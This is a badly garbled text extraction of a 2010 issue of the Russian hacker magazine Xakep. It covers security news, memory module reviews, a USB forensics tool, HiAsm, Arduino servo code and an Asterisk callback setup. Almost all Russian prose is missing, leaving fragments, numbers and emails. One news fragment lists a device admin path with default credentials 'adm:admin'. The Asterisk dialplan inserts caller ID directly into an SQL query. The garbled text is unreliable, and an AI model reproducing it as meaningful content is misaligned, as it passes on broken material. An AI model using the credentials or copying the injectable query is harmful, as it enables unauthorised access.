Хакер 2010 10 PDF

.
48
x 10 () 2010
.
210
:

10 (141) 2010
AOL/ AOL
AOL
CALLBACK:

. 34

AOL
. 66
141
METASPLOIT FRAMEWORK
-

LINUX
SALITY.AA

VPN-
HITB
HACK IN THE BOX

. 54
INTRO

Chaos Constructions:
. ,

IT, , ,
: ,
. CC
,

.
, :
. :
, CC
, ,
-
Defcon BlackHat, , , HITB :).
nikitozz,
. .
udalite.livejournal.com
http://vkontakte.ru/club10933209
* ? 3D ,
EligoVision.
: DVD
www.xakep.ru/3dmarkers/ Windows
Linux, web- ,

.
EligoVision 3d-
www.eligovision.ru.
CONTENT
MegaNews
004
080
FERRUM
016
018
BBK
020
AMD
ASUS U43Jc
HD-
DDR3
PC_ZONE
025
026
030
034
HiAsm
Arduino
Callback
038
Easy-Hack
042
048
054
HITB
060
Metasploit Framework
066
AOL
070
X-Tools
MSF
AOL
MALWARE
072
- :
076
][-: Sality.aa
Nod32, Avast, Avira:
Parallels
086
092
100
098
103
VPN
Linux,
Linux
LUKS/dm-crypt, TrueCrypt EncFS
VPN-
108
Python -
112
WTF WCF?
116
MSN-
119
Windows Communication Foundation:

-
IM-
: ( )
SYN/ACK
122
126
AD CS?
130
SET
IT-

LiveDVD/LiveUSB
Certificate Services Windows Server 2008 R2 vs.

Windows Srver 2003
134
PSYCHO:
140
FAQ UNITED
143
144
WWW2
, : , ,
?
FAQ
8.5
web-
066
AOL
030
Arduino
108
054
Python -
HITB
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step (step@real.xakep.ru)
> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)
>

(korenfeld@gameland.ru)
>

/:
/ .: (495) 935-4034, : (495) 780-8824

>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)
> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2010
MEGANEWS
MIFRILL
MARIA.NEFEDOVA@GLC.RU
MEGANEWS

ETHERNET WI-FI

,
,
, ,
, , .
,
, .
Wi-Fi?
:
, ,
.
Netgear
Universal WiFi Internet Adapter (WNCE2001).
-
Ethernet- Wi-Fi 802.11n,

. WNCE2001

Ethernet
, Wi-Fi Protected Setup
( WPS
, ). Netgear ,
, , USB.
Netgear Push N Connect
plug-and-play.

2000 .
,
Verdana .
WIKILEAKS
, WikiLeaks
(
,
),
. ,
,
.
WikiLeaks,
. ?
, :). , , . , , (
, , , )
, , .
WikiLeaks . , ,
e-mail Dagens Nyheter, ,
. , , , .
004
X 10 /141/ 10
MEGANEWS

(The U.S. Copyright Office)
,
.
,
.
:
- ,
,
;
- ,
, ,
;
- DVD-,
,
, ,
;
- (DRM)
;
- , , ,
.
, Jailbreak
iPhone ,
DVD . Apple, , , ,
, ,

, Apple .
, ,
, .
,
Apple ,
( ),
.
, , ,
(
SMS, e-mail
).
,
, ,
Jailbreak

.
SMS- Android OS.

Trojan-SMS.AndroidOS.FakePlayer.
(Butterfly)
. ,
-, Mariposa,
.
,

. , ,
Butterfly ( )
$5001.300.
: ,

Butterfly-,
23- Iserdo (
).
,
. ,
, : -
006
, , , ,

. , ,

Iserdo, .
X 10 /141/ 10
MEGANEWS

,
. Brazilian Banker,
, ,
,
RSAs FraudAction Research Lab ,
.
( , ,
Orkut).

Ana Maria,

. ,
,
, EIOWJE.
,
.
,

.
$88,5
427.393
,
., Blizzard
, WoW.

.
$200

-
Black Hat , ,
, .
Black Hat
, ...
Tranax Technologies
Triton . ,
,
. ,

,
. Tranax Technologies ,
Dillinger.
Dillinger
. Triton, ,
Scrooge (
). ,
Triton ( ) ,
10 .

, .

; Triton
, Tranax Technologies
. , Tranax
ATM, .
KINDLE , ,
Amazon : Kindle DX
Kindle .
: Kindle Wi-Fi Kindle 3G + Wi-Fi.
6- 600x800 . Amazon
,
50%
( 10:1 6:1),
.
, .

21%, 17%.
008
190x122x8 , 241
. - , - ,
4 ( ,
3.500 ), 20%.
:
Kindle PDF WebKit.
,
,
$139 Wi-Fi $189 3G + Wi-Fi
. ,
Nook.
X 10 /141/ 10
>> coding
lotus.xakep.ru
X-testing ontest
-
IBM Lotus Symphony 3.
Lotusphere 2011 !
,
Lotus Symphony Beta 3
lotus.xakep.ru. :
,
!
MEGANEWS
GSM-
,
, RC4, Skype.
,
.
Black Hat
Kraken, A5/1,
GSM-, AirProbe,
SMS. ,
A5/1 ,
, . , Kraken ,
, SMS
, 30 .
Kraken
1,7 ,
( , ).
:
GSM-
-; ,
Wi-Fi-

Wi-Fi. Wi-Fi WPA
, , GSM .
, Kraken, AirProbe, , ,
.
, , ,
,
.
, , , ,
, ,
,
- ( Wi-Fi- ). ,
-
Kraken
Airprobe. , , , ,
. ,
Defcon
( $1.500)
GSM-.
, ,

:
- AT&T,

.
TOSHIBA
Toshiba
.

Wipe (, ). Wipe ,
,

,
.
Toshiba (Self-Encrypting Drive, SED),

. ?
: HDD , - ,
, , ,
.
, ,
HDD .
BitDefender , 75%
.
PS3
psx-scene.com
ozmodchips.com , PlayStation 3 -
. PS Jailbreak, USB-,
, .
PSX Scene ( ), , debug- PS3.
, ,
PS Jailbreak. , psjailbreak.com,
, FAT- SLIM-
. : $130 .
, , , .
Sony , ,
, , ,
PS3 . !
:).
010
X 10 /141/ 10
PLAY FAST,
LEVEL UP

DVD
,

PlayFast.

. ,
,

. ,
,
. ,
. ,
, . -
Digital Solutions
.
. - ,
Starcraft .
:
. ?
, ,
. , .
torrent, ( ). , 5-10%, ,
Starcraft II .
:).
- . ,
, .
-
Apple.TV, :
HD- .
: ,
.
Steam Xbox Live Marketplace, , ,
,
.
: 20-30 ,
.
,
.
, , 8 . (
8-10 ), .
X 10 /141/ 10
, ....
Digital Solutions . ,
PlayFast (www.playfast.ru),
. ,
, .
.
, ,
. : - PlayFast , ,
. ,
.
PlayFast . ,
, .
, ,
. : 20-30
, .
. , , ,
.
:
, , .
.
, . ,
. ? : , .
011
MEGANEWS
BLU-RAY
, , ,
-.
. 68240
,

CD, DVD,
Blu-ray ..

. , 27

200 ,
, , 45 .
.
- :

25 , 50 . 26 /,
36 /.
120 ,
1,2 ,
. ? ,
Blu-Ray.
Blu-Ray ,
, ,

60 .

LOGITECH

,

.
,
, .
Logitech Wireless Illuminated Keyboard K800
Logitech , .

(
) ,

.
Logitech ,
10 (,

mirco-USB). Logitech
Unifying, Logitech
Advanced 2.4 GHz .
PerfectStroke,
, Incurve Keys .
,
100 .
19 54 Virus
Bulletin, VB100.
Kingsoft Bkis BKAV.
CHROME OS TABLET
Chrome OS. downloadsquad.
com, ,
, ,
, HTC
Chrome OS Tablet.
, HTC
Nexus One, ,
, .
DownloadSquad

,
012
Verizon 26 ! DownloadSquad
,
, ,

,
.
, : Google Verizon .
Engadget
DownloadSquad
, . , Chrome OS
2011
.
X 10 /141/ 10
ANDROID- LG
ANDROID
LG
Android 1.6
LG Optimus (GT540). -
: !
- 3.0 Android ,
.
:
8.990 .
,
Android-
:).
Qualcomm
MSM7227 600 , 200
TFT- 3.0 (320x480).
microUSB, Wi-Fi,
Bluetooth 2.1+EDR (A2DP), FM- microSD (2
, 32 ).

: 3
,
. Android
, , , .

(Justin Case)

Android Licensing Service,

Android-
.
Licensing Service

Google ,

.

- ,

,

( ).
,
,

.

www.androidpolice.com , Google
.
: Intel
McAfee ,
, $7,68 .
WPA2
, AirTight Networks, Wi-Fi-
WPA2. , Hope 196, , IEEE802.11
(Revision, 2007). : WPA2-
: Pairwise Transient Key (PTK), ,
, Group Temporal Key (GTK),

-. , PTK
, GTK . , Hole 196,
, GTK
196 IEEE 802.11! -,
. Man-in-themiddle , Wi-Fi-,
, ,
.
, , MAC-. , ,
,
, WPA2 .
: www.airtightnetworks.com/wpa2-hole196
X 10 /141/ 10
013
MEGANEWS
CARDERPLANET
carderplanet.com (CC
2004 ),

. 27-
,
.
, BadB,
. , BadB
CC
.

, .
.
. ,
, BadB

,
.
, ,

.

10 250
,
2 ,
250 .
WI-FI-
Parrot
AR.Drone, iPhone,
. ,
, .
, www.rabbit-hole.org, :). ,

Wi-Fi-! -23,
Via Epia Pico ITX PC (500 Via C7, 1 RAM Backtrack 4 )
ArduPilot.

, PPP over SSH .
ArduStation, . Edge/3G
, ,
. WASP (Wi-Fi Aerial Surveillance Platform) 30-45 , ,
, 7 . , ,
, GPS-, ,
, ,
. ?
?. , Google
Microdrones.

. Google Earth Google Maps.
Harris Interactive , , ,
49% 52%
.
IPAD
iPad
Shenzhen Paoluy Silicone Technology. BL-BKB76,
,
, (Bluetooth) QWERTY- iPad .
.
Apple
-, 4-4,5
.
100 ,
90 .
, $90.
014
X 10 /141/ 10

, , ,
, .

,

, rsnet.ru. ,
,
, : https://[ip]/cgi-bin/main.scm,
adm:admin. , , ,
-
() - ,
, SMS . , ,
.
,
, , , . ,
, ,
(
).

.
Avast $100 .
Summit Partners.
- freemium.
X 10 /141/ 10
015
FERRUM
-
ASUS U43Jc
, ASUS
Bamboo,
:
, ,
, .

ASUS U43Jc .

:
!
.
,
: -
016
.
: ASUS
,
, ,
.
ASUS ,
:
,
!
.
, : 14
.
X 10 /141/ 10
: Intel Core i7-620M 2,66

: Mobile Intel HM55 Express Chipset
: 4 DDR3 1066 SDRAM
: 14", , 16:9, 1366x768, LED-
: NVIDIA GeForce 310M, 1 DDR3 VRAM
: 640, 5400 /
: 5--1 (SD,MMC,MS,MS-Pro,XD); Mic; Headphone; VGA/Mini D-sub; USB 3.0; 2xUSB 2.0; RJ45; HDMI
: 34.4 x 24.1 x 2.20~3.18 , 2.14
DVD Super Multi

ASUS Crosslink , - .

DVD- ,

. USB, ( Windows MAC)
4 .
USB- ASUS CineVibe

,
. ,
, , . ,
CS Source ,
:).
ASUS VECTOR BACKPACK

. /
, , :
.
,
, . 16 .
, : LED- 1366x768 , HD-

.
, .
.

ASUS . , ,

. , ,

, .
, .
ASUS U43Jc :
Intel Core i7-620M
X 10 /141/ 10
2,66 Intel Turbo Boost, 3.33 , ,

, .
NVIDIA GeForce 310M 1 DDR3 VRAM. ,
Intel Core i5 GMA
HD.
NVIDIA
Optimus, ,
.
, HDMI-, USB, USB 3.0.
ASUS Super Hybrid Engine (SHE), ,
.
,
: , ASUS U43Jc
10.5 !
U43Jc ASUS Bamboo Series :

U33Jc ( 13.3) U53Jc (15.6).
: ,
U33Jc .
, ASUS U43Jc .
: , 14.
,
.
. , : 10.5 ASUS.
ASUS
trendclub.ru. Trend Club
, .
Trend Club , , . Trend
Club Intel ASUS
.
Intel, , , ,
.
Intel Web- Intel http://www.
intel.ru, http://blogs.intel.com.
Intel www.intel.ru/rating.
017
FERRUM
BBK
, , , , ? -
, .

HDTV Full HD.
1280720 19201080 -
. -
HD SD,
, : !
?! , ,
HD.
, ,
-
,
HDTV ,
4:3 .
,
.
,
HDTV-
BD- ,
,

, .
, ,
Blu-ray
.
, - ,
, , ,
,
, , .
-
.
,
.
,
HD- BBK,

.
018
MP050S
, ,
.
, MP050S -
,
, USB- ( FAT, FAT32 NTFS)
. ,
,
.
MP050S ,
USB-, ,
.
- , MP050S
, MKV
(Matroska) MOV (H.264).
2890 .

:
: HDMI 1.3, , , , USB 2.0,
SD/MMC/MS
:
- MPEG-1/2/4, MPEG-1/2 PS (M2P, MPG), MPEG-2, VOB, AVI, ASF,
WMV, MKV (Matroska), MOV (H.264), MP4
- AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- JPEG HD, JPEG, BMP, PNG
- ISO, IFO
: 1080p
HDD :
:
: 121x26x101
X 10 /141/ 10
MP060S
MP070S
MP060S
.
HDTV ,
-
(BitTorrent HTTP).
, , ,
.
SATA- (
),
HD-.
, , , , . ,
, MP060S
- .
,
.
MP070S .
, MP070S, MP060S
, -
.
, ,
-
SATA 3.5". , 6080 , , ,
1.5 .
4690 .
3600 .
: LAN (Ethernet) 10/100 /

: HDMI 1.3, , , , , , USB 2.0, MiniUSB, SD/MMC/MS, eSATA Host
:
- AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- ISO, IFO
: 1080p
HDD :
:
: 134x195x125
: LAN (Ethernet) 10/100 /

: HDMI 1.3, , , , , , USB 2.0 2, MiniUSB, SD/MMC/MS, SATA Host
:
- AC3 (Dolby Digital), DTS, WMA, WMA Pro, AAC, MP1, MP2, LPCM,
AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- ISO, IFO
: 1080p
HDD : ( 3.5
SATA)
:
: 210x51x162
X 10 /141/ 10
019
FERRUM

: ASUS Crosshair IV Formula

, : 2700, Athlon II X4 635
: MSI Radeon HD 4850
, : 700, FSP Blue Storm
: Windows 7 32-bit
AMD
DDR3
, , .
,
, , .
AMD, . ,
, ,
.
.
, AMD, , ,
, ,
. ,
, , 1800 .
FSB, . ,
,
,
, ,
( ) . , ,
, , , , , , . .

, ,
, , , .
, 1800
.
2000 ,
, , ,
, .

. , ,
,
. ,
(9-9-9-24) (1,65 ).

SuperPI , ,
, ,

; Everest, , , . PCMark Vantage,
,
. ,
WinRAR.
020
X 10 /141/ 10
2700 .
5700 .
APACER GIANT II
DK 02GAL F9QK2
:
, : 1024
, : 1800
: 9-9-9-27
, : 1,65
:
, . Apacer,
,
,
. .
(1980 ), , ,
, .
,
: . , , .
, , ,
, - 2 ? ,
Windows XP, .
. 1800 ,
9,
2200 .
.
X 10 /141/ 10
APACER GIANT II
DK 04GAS F1QK2
:
, : 2048
, : 2200
: 10-10-10-30
, : 1,65
:
Apacer
. - 4
Windows 7,
, . .
,
,
.
, . , AMD ,
Intel, ,
. , , ,
, .
021
FERRUM
7500 .
10300 .
CORSAIR DOMINATOR
GTX CMGTX2
:
, : 1024
, : 2250
: 8-8-8-24
, : 1,65
:
,
. - , , , ,
.
8-8-8-24 2250 .
, 1792 , ,
PCMark Vantage . , GTX
.
, . , , ,
.
.
022
KINGMAX HERCULES
FLKE85F-B8KJA FEIH
:
, : 2048
, : 2200
: 10-10-10-30
, : 1,5
:
4 , , ,
( ,
1,5 ) . , ,
AMD . , ,
Intel .
, , , . , (
7 /). , .
X 10 /141/ 10
7000 .
13000 .
KINGSTON HYPERX
KHX2000C8D3T1K2/4GX
KINGSTON HYPERX
KHX2133C8D3T1K2/4GX
, : 2048
, : 2000
: 8-8-8-24
, : 1,65
:
Kingston, ,
, ,
,
. , , WinRAR
, . HyperX
. ,
, . , 2000 8-8-8-24 ,

, , . Kingston, ,
.
, A M D , .
X 10 /141/ 10
, : 2048
, : 2133
: 8-8-8-24
, : 1,65
:
,
Kingston, , . , . , . ,
.
, 133
.
, AMD, 2133 , ( Kingston HyperX

KHX2000C8D3T1K2/4GX) .
,
.
K i n g st o n
H y p e r X K H X 2 0 0 0 C 8 D 3 T 1 K 2 / 4 GX , . A p a ce r G i a n t I I ( D K
0 2 GA L F 9 Q K 2 ) . z
023
FERRUM
PCMARK
Apacer Giant II (DK 02GAL F9QK2)
Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH
500
1000
1500
2000

Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
0 500 1000 1500 2000 2500 3000 3500 4000 4500

Apacer
, ,

SUPERPI
WINRAR

Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator

Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
10
15
20
25
30
,
Transcend !
500
EVEREST,

Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator

Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
10
15
20
25 30 35 40 45 50
2500
2000
4000
6000
8000
10000
12000

5%

Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
0
2000
4000
6000
8000
Apacer, Corsair Kingston
024
2000
EVEREST,
EVEREST,
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
1500
, ,
3%
,
,
1000
10000
12000
0 1000 2000 3000 4000 5000 6000 7000 8000

X 10 /141/ 10
PC_ZONE
Step twitter.com/stepah

,
. forensics.
#100 ][
:
, ,
,
- .
forensic
,
, , history
-,
- .
, ,
,
.
,
,
.
, - ,
.
, .

USB- -
USB-, , .
,
,
. ,
,
, .
,
- . ,
forensic,
.
Windows.
, ,
,
.
. , ,
.

,
. ,
025
usbHistory

.
, ,
. PnP
,
USB- USB Driver
USBSTOR.SYS.
(MountMgr.sys),

,
. ,
,
.

.
: HKLM\
SYSTEM\CurrentControlSet\Enum\USBSTOR.
, -
,
. , ,
.
,
,
,
, .
. HKEY_
LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\DeviceClasses\{53f56307-b6bf-11d094f2-00a0c91efb8b}
.
, (
), Control,

.
Windows
Forensic Analysis (Harlan Carvey),
.
, usbHistory (sourceforge.net/
projects/usbhistory).
,
,
:
USB History Dump
by nabiy (c)2008
(1) --- USB Device
instanceID: 1001178901b3f6&0
ParentIdPrefix:
Driver:{4d36e967-e325-11ce-bfc108002be10318}\0032
Disk Stamp: 03/28/2010 18:10
olume Stamp: 11/03/2009 17:26
(2) --- USB Flash Drive USB
Device
[..]
.

.
,
,
,
.
, .
. z
X 10 /141/ 10
PC_ZONE
Dilma support@hiasm.com

HiAsm
, -
. ,
,
. .
- . ,
,
.
, : Basic, Pascal, C .
, () ,
,
Delphi C++.
, . ,
,
LabView, HiAsm, SoftWire .
? .
HIASM
HiAsm ,
, ,
. , -
(, , , , ..
026
..). ( )
(
,
). , .
,
( , ,
, ,
, ).
,
( ) .
,
Hello world!,
. , , .
: (Button)
(Message), (
)
Message ( Hello world!).
, , , HiAsm:
Make(delphi)
Add(MainForm,2953706,21,105)
{
X 10 /141/ 10
}
Add(Button,147563,189,105)
{
Left=180
Top=110
link(onClick,5363509:doMessage,[])
}
Add(Message,5363509,238,105)
{
Message="Hello world!!!"
}
Object Pascal,
. , HiAsm
.
.

Windows, Object Pascal
FPC Delphi.
:
PocketPC C++ MS ARM Microsoft Windows Mobile;
WEB PHP JavaScript HTML;
QT C++ Windows, Linux MacOS;
VBS Basic Windows .
just for fun online- HiAsm (hion.
hiasm.com), ,
.
Windows ( hiasm.
com 4.4)
ab apache-tools.
-
URL , .
100 http://ya.ru
, . , .
,
.
HiAsm : ...,
Windows Windows.
.

, ,
. ,
TCP
. TCP-.
X 10 /141/ 10
HTTP- 80, IP ya.ru 93.158.134.3.

, .
. Strings
HTTP- :
GET / HTTP/1.1
Host: ya.ru
Connection: close
< >
< >
,
. ,
.
(Hub),
,
. ,
,
HTTP/1.1 200 OK.
,
:
onClick ( );
doEvent1 ;
, , onEvent1 onEvent2;
onEvent1,
doOpen TCP-.
ya.ru 80 ;
, ,
, onEvent2;
, , doSend TCP.
Data, .
Text
, , , , , ;
, , TCP-
onRead;
onRead doAdd ,
.
, , .

, . ,
Data
, .
onClick , -
027
PC_ZONE
( 1)
, , doSend.

, ,
- .
, ,
.
.
.
, , .
(onClick doStart onStart
doEvent1), doStop onDisconnect
TCP-. ,
,
onDisconnect, . ( ,
doStart doStop)
onStop.
, , ,
(
). ,
. , .
,
100 .
onDisconnect
,
. , . ,
,
, . onDisconnect,
100. 100,
,
. ,
. Op1
Result,
, , onDisconnect.
: x = x + 1.

onResult, doCompare
. 100,
:
028

( 2)
if(x < 100)

[ doEvent1 ]
else
[ doStop ]
, , doClear
. doClear
onDisconnect
,
.
,
,
onStart doEvent1 .

, ,
.
, (
onDisconnect, )

,
.
:
(Hub) .
-(DoData)
.
(Memory)
.
:
(Math) .
(If_else)
.
(For)
, .
-> (Timer)
.
-> (Debug) ,
.
X 10 /141/ 10

( 3)
INFO
HiAsm
.
-
. ,
, .
, . , HiAsm ( , ,
) - . HiAsm
, , ,

. :).
(,

), HiAsm
,
. , ,
( ) , .
, ,
. ,

, ,
, ,
, .
,

.
-
, 10
, .

, , ,
X 10 /141/ 10
. , , ,

.
,
, , ,
. - ,

, . ,
,
, ,
,
.

Windows ( )
,
.
HiAsm
. , ,
, ,
, .
, ,
HiAsm.
,
(
, ..),
(, , )

- .
, - . : ,
500-1000 ,
.
,
: , ,
HiAsm 7000 .z
info
HiAsm (
)
,
,
dilma ( ,
), nesco ( ), iarspider
( ), nic
( )
.

,
,

.
HTTP://WWW
links
HiAsm:
hi-asm.blogspot.com

:
my-hiasm.net.ru
HiAsm online:
hion.hiasm.co
029
PC_ZONE
noonv13@gmail.com
-

Arduino
,
,
. , , - , ,
. ,
, Arduino .

.
, . , - ,
, , , - . ,
,
. Arduino. , ,
. -,

. ?
ARDUINO?
, Arduino, /
Wiring. , C++,
.
Arduino ATmega328 ATmega168
030

.
5 16
, (). .
. (), , , ( ) Arduino IDE . ?, . : ()
.
( AVR) ( ),
(7 LPT- ) (
). ,
- (, , ).
: Arduino .
USB-. ,
Arduino !
Arduino 9-12
(
X 10 /141/ 10
$5
Arduino
Arduino -
, ), USB- .
, ,
USB- A-B,
.
.
. Arduino /
. 14 /
. ,
, .. - . , Arduino 0
1.
5 . , .

. , - , . . Arduino
Arduino IDE, Wiring ( , C++),
AVR WinAVR.
C.
Arduino , .
, ,
. Arduino
Arduino (www.arduino.cc). , Arduino
. Arduino
, - (
duino): , Freeduino, Seeduino CraftDuino. Arduino
, , Linuxcenter (www.linuxcenter.ru/shop/embedded/
arduino) , , -
- (, www.sparkfun.com). $30.
, Arduino
.

, . , , /
.. , Arduino
- (, ),
. , Ethernet- Arduino X 10 /141/ 10
( ). GSM-
, GPS- GPS-,
Wi-Fi- ..

. , Arduino

, . - Arduino!
Twitter? ? ! , ,
, ,
Arduino.
, .
, .
- Arduino. .
.
. ,
Arduino, , (
). ? , , , ( 40
).
.
, . , Arduino
( ).
L293D (
Motor- , ).
.
.
-,
. , ,
, Arduino . ,
( ) ,
SG-90 USB.
-
$5 .
, , ,
, .
- .

.
, ,
( ).
( ),
, - ,
. :
031
PC_ZONE
OpenCV -
(/),
+5 (),
(//).
, .
,
.
.
, .
, Arduino IDE
Servo (www.arduino.cc/en/
Reference/Servo). , 0 180 :
#include <Servo.h>
Servo myservo; //
// 8
int pos = 0;
//
void setup()
{
myservo.attach(9); //
}
void loop()
{
for(pos = 0; pos < 180; pos += 1)
// 0 180
{
// 1
myservo.write(pos);
//
delay(15);
// 15
}
//
for(pos = 180; pos>=1; pos-=1)
// 180 0
{
myservo.write(pos);
delay(15);
}
}
ARDUINO
, , . -,
() .
. , ,
032

. . Arduino
( CraftDuino) , .
,
. :).
, : Arduino,
.
. Arduino . ,
Servo (
Arduino IDE).
,
Firmata, , Servo,
Arduino IDE. Firmata ,

Arduino . Arduino,
:
#include <Firmata.h>
#include <Servo.h>
Servo servo7; // Servo
Servo servo8; //
// ,
Firmata
void analogWriteCallback(byte pin, int value)
{
if(pin == 7)
servo7.write(value);
// value
if(pin == 8)
servo8.write(value);
}
void setup()
{
//
Firmata.setFirmwareVersion(0, 2);
// -
Firmata.attach(ANALOG_MESSAGE, analogWriteCallback);
servo7.attach(7);
//
servo8.attach(8);
Firmata.begin(9600);
// Firmata
X 10 /141/ 10
DVD
dvd
Arduino
++
.

(robocraft.ru/files/
opencv/servobot/
servobot.zip).
HTTP://WWW
void loop()
{
while(Firmata.available())
//
Firmata.processInput();
// -
}
links

Arduino.
Arduino IDE,
Tools Board, ,
(Tools Serial Port),
.
Done compiling.
Arduino,
. , Done
uploadling., !
-.
, ++.
web-cam-
,
OpenCV (sourceforge.net/projects/opencvlibrary).
,
Intel (
). , OpenCV
,
.
, .
: -
, .
, .
- ,
( 90
). rotate(), X 10 /141/ 10
-
OpenCV: cvWarpAffine(),
. ,
-,

:
//
int A = 0;
int Amax = 180;
//
int F = 0;
int Fmax = 180;
IplImage* dest = 0;
//
// -
//
void myTrackbarA(int pos) {
A = pos;
// Firmata
char buf[3];
buf[0] = 0xE0 | 7;
buf[1] = A & 0x7F;
buf[2] = (A >> 7) & 0x7F;
sg.Send(buf, 3);
Sleep(100);
}

Arduino:
www.arduino.cc
:
robocraft.ru/blog/
computervision
WinAVR:
sourceforge.net/
projects/winavr
Arduino :
community.
livejournal.com/
ru_arduino
, , . .
, , . , , !
! ,
. -
.
, , , Arduino
. , ? ,
. z
033
PC_ZONE
Aggressor

Callback
IP-.
, , -
Skype-, Wi-Fi 3G.
,
callback, VoIP
. , , VoIP-.
callback VoIP. , ,
,
. - ,
-. - ,
.
. : ,
, .
PIN- ( )
, .
, callback.
.
-
, ,
. , ,
Asterisk. , Asterisk . , ,
034
. PDF- ,
(www.xakep.ru/magazine/xa/107/152/1.asp www.
xakep.ru/magazine/xa/108/154/1.asp).
TrixBox, Elastix ..;
. , , . , , Asterisk . ,
Asterisk
, SIP. .
, , SIP-, , . VoIP FXO-, :
Caller ID,
. ,
. SIP-, ,
. ( )
VoIP-, .
, ,
. . .
, Asterisk VoIP-GSM , :
5000 .
X 10 /141/ 10
SIM- SIM Dialer
MySQL
3G-, 1000 . SIM Dialer,
, ,
callback- .
, SIM- ( ).
, , Asterisk
, .
, .
/etc/asterisk/extensions.conf (
,
) , : [fromgorod].
, ,
, (IVR),
PIN-, .
310309:
[fromgorod]
exten => 310309,1,NoOp(zvonyat s nomera
${CALLERID(all)})
exten => 310309,n,NoOp(${STRFTIME(${EPOCH},,%d.%m.%Y%H:%M:%S)})
exten => 310309,n,GoToIf($["${CALLERID(number)}" =
"8901234567"]?ivr,s,1)
exten => 310309,n,Answer() ;
......
NoOp Asterisk
. Caller ID ,
. ,
. exten => 310309,n,GoToIf($["${CALLERID(
number)}" = "8901234567"]?ivr,s,1) , , . 8901234567,
IVR; ,
. ,
8 .
callback- ,
. , 50? . Asterisk
MySQL, CDR.
X 10 /141/ 10
Asterisk, CDR.
callback. mysql -u asterisk -p asterisk, ,
.
(, PIN-, callback, )
:
CREATE TABLE 'callback' (
'phone' varchar(80) NOT NULL default '',
'pin' int(11) NOT NULL default '4321',
'callback' int(11) NOT NULL default '0',
'user' varchar(255) NOT NULL default ''
);
INSERT INTO callback(phone, pin, user)
values('8901234567', '2602',
'Aggressor');
, , Asterisk ? , [fromgorod]:
exten => 310309,1,NoOp(zvonyat s nomera
${CALLERID(all)})
exten => 310309,n,NoOp(${STRFTIME(${EPOCH},,%d.%m.%Y%H:%M:%S)})
exten => 310309,n,MYSQL(Connect connid localhost
asterisk asterisk asterisk)
exten => 310309,n,MYSQL(Query resultid ${connid}
select pin, callback from callback where
phone=${CALLERID(number)})
exten => 310309,n,MYSQL(Fetch fetchid ${resultid} pin
callback)
exten => 310309,n,NoOp(pin -> ${pin} callback# ->
${callback})
exten => 310309,n,MYSQL(Clear ${resultid})
exten => 310309,n,MYSQL(Disconnect ${connid})
exten => 310309,n,GoToIf($["${pin}" != ""]?ivrpass,s,1)
exten => 310309,n,Answer() ;
, , :
, SQL-
.
GoToIf($["${pin}" != ""]?ivr-pass,s,1). , pin ,
ivr-pass.
IVR
, .
? , PIN, , .
, ,
035
PC_ZONE
CLI ,

IVR. , , ivr-pas:
[ivr-pass]
exten => s,1,Background(WelcomePass) ;
exten =>s,n,WaitExten(10)
exten => _XXXX,1, GoToIf($["${EXTEN}" =
"${pin}"]?ivr,s,1)
exten => _XXXX,n,Hangup
exten => t,1,Hangup
exten => i,1,Hangup
GSM-
SIP, .
, VoIP-GSM ,
3G USB- HUAWEI 1550, .
callback, SMS.
, , ,
MICRO-BOX HUAWEI MODEM UNLOCKER.
.
2.6.32 .
Asterisk (www.makhutov.
org/svn/chan_datacard), 3G-.
, chan_datacard.so /usr/lib/
asterisk/modules. ? . ./trunk/
etc/datacard.conf /etc/asterisk.
[datacard0] [datacard1] , . , ,
:
[datacard0]
audio=/dev/ttyUSB1
data=/dev/ttyUSB2
context=datacard-incoming
group=1
rxgain=3
txgain=3
,
. / , SMS:
CLI>datacardsms datacard0 89000000000 Hello!
CLI>datacardussd datacard0 *102#
[datacard0] Got USSD response: ' 155.49 .
+=. ? + 5050 3'
036

call-
WelcomePass ( /var/lib/asterisk/sounds/ru).
10 .
, : exten => t,1,Hangup. PIN
, , : exten =>
i,1,Hangup. , , Hangup
PIN, . ,
, PIN-,
ivr.
[ivr]
exten
exten
exten
exten
exten
exten
exten
exten
exten
exten
exten
exten
exten
=>s,1,Set (inum=0)
=>s,n,Set (tnum=0)
=> s,n,Background(Welcome)
=>s,n,WaitExten(10)
=> 1,1,GoTo(ivr-out,s,1)
=> 2,1,GoTo(ivr-ch-pin,s,1)
=> i,1,Playback(pbx-invalid)
=> i,n,Set(inum=$[${inum} + 1])
=> i,n,GotoIf($["${inum}" < "3"]?s,1)
=> i,n,Hangup()
=> t,1,Set(tnum=$[${tnum} + 1])
